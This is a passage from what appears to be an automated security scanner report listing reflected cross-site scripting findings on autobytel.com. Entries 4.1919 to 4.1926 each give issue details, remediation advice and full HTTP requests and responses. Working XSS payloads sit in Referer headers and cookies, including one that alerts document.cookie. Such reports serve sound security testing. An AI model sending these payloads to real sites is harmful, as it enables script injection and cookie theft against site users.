Referer: http://www.google.com/search?hl=en&q=79d8a--><img%20src%3da%20onerror%3dalert(1)>d955c1d591b

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:36:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:36:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:36:29 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:36:29 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E79d8a%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3Ed955c1d591b;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 39618


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<!-- searchphrase: 79d8a--><img src=a onerror=alert(1)>d955c1d591b -->
...[SNIP]...

4.1919. http://www.autobytel.com/content/home/help/index.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42ed3"%3balert(1)//0f0891904b3 was submitted in the Referer HTTP header. This input was echoed as 42ed3";alert(1)//0f0891904b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/home/help/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=42ed3"%3balert(1)//0f0891904b3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:43:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:43:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:43:56 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:43:56 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E42ed3%22%3Balert%281%29%2F%2F0f0891904b3;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 45334


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~42ed3";alert(1)//0f0891904b3";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "481DE4D5-EBA6-BE43-8346E63C
...[SNIP]...

4.1920. http://www.autobytel.com/content/home/help/index.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload cb3db--><img%20src%3da%20onerror%3dalert(1)>6e9f591d420 was submitted in the Referer HTTP header. This input was echoed as cb3db--><img src=a onerror=alert(1)>6e9f591d420 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /content/home/help/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=cb3db--><img%20src%3da%20onerror%3dalert(1)>6e9f591d420

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:44:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:44:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:44:08 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:44:08 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Ecb3db%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E6e9f591d420;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 45372


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<!-- searchphrase: cb3db--><img src=a onerror=alert(1)>6e9f591d420 -->
...[SNIP]...

4.1921. http://www.autobytel.com/content/home/help/index.cfm/action/about [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm/action/about

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 9b173--><img%20src%3da%20onerror%3dalert(1)>95758ff5f56 was submitted in the Referer HTTP header. This input was echoed as 9b173--><img src=a onerror=alert(1)>95758ff5f56 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /content/home/help/index.cfm/action/about HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=9b173--><img%20src%3da%20onerror%3dalert(1)>95758ff5f56

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:42:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:42:58 GMT
Content-Length: 32454
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:42:58 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:42:58 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E9b173%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E95758ff5f56;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<!-- searchphrase: 9b173--><img src=a onerror=alert(1)>95758ff5f56 -->
...[SNIP]...

4.1922. http://www.autobytel.com/content/home/help/index.cfm/action/about [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm/action/about

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b589"%3balert(1)//50ec6a055e4 was submitted in the Referer HTTP header. This input was echoed as 8b589";alert(1)//50ec6a055e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/home/help/index.cfm/action/about HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=8b589"%3balert(1)//50ec6a055e4

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:42:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:42:51 GMT
Content-Length: 32416
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:42:51 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:42:51 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E8b589%22%3Balert%281%29%2F%2F50ec6a055e4;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~8b589";alert(1)//50ec6a055e4";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "4813DB07-978D-A724-75E7E8DA
...[SNIP]...

4.1923. http://www.autobytel.com/content/home/help/index.cfm/action/contact [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm/action/contact

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcb62"%3balert(1)//a0c00af98bd was submitted in the Referer HTTP header. This input was echoed as fcb62";alert(1)//a0c00af98bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/home/help/index.cfm/action/contact HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=fcb62"%3balert(1)//a0c00af98bd

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:37:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:37:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:37:01 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:37:01 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Efcb62%22%3Balert%281%29%2F%2Fa0c00af98bd;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 36701


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~fcb62";alert(1)//a0c00af98bd";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "47DE7D83-94A8-B245-34B7EF85
...[SNIP]...

4.1924. http://www.autobytel.com/content/home/help/index.cfm/action/contact [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm/action/contact

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 3ef12--><img%20src%3da%20onerror%3dalert(1)>8e8f0c27a06 was submitted in the Referer HTTP header. This input was echoed as 3ef12--><img src=a onerror=alert(1)>8e8f0c27a06 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /content/home/help/index.cfm/action/contact HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=3ef12--><img%20src%3da%20onerror%3dalert(1)>8e8f0c27a06

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:37:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:37:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:37:09 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:37:09 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E3ef12%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E8e8f0c27a06;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 36739


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<!-- searchphrase: 3ef12--><img src=a onerror=alert(1)>8e8f0c27a06 -->
...[SNIP]...

4.1925. http://www.autobytel.com/content/home/help/index.cfm/action/privacy [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm/action/privacy

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 993ca"%3balert(1)//86d7bd50876 was submitted in the Referer HTTP header. This input was echoed as 993ca";alert(1)//86d7bd50876 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/home/help/index.cfm/action/privacy HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=993ca"%3balert(1)//86d7bd50876

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:53:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:53:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:53:09 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:53:09 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E993ca%22%3Balert%281%29%2F%2F86d7bd50876;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 55412


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~993ca";alert(1)//86d7bd50876";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "487245C4-FF7A-DD97-59131142
...[SNIP]...

4.1926. http://www.autobytel.com/content/home/help/index.cfm/action/privacy [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm/action/privacy

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 80808--><img%20src%3da%20onerror%3dalert(1)>f990e3ef845 was submitted in the Referer HTTP header. This input was echoed as 80808--><img src=a onerror=alert(1)>f990e3ef845 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /content/home/help/index.cfm/action/privacy HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=80808--><img%20src%3da%20onerror%3dalert(1)>f990e3ef845

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:53:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:53:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:53:27 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:53:27 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E80808%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3Ef990e3ef845;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 55450


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<!-- searchphrase: 80808--><img src=a onerror=alert(1)>f990e3ef845 -->
...[SNIP]...

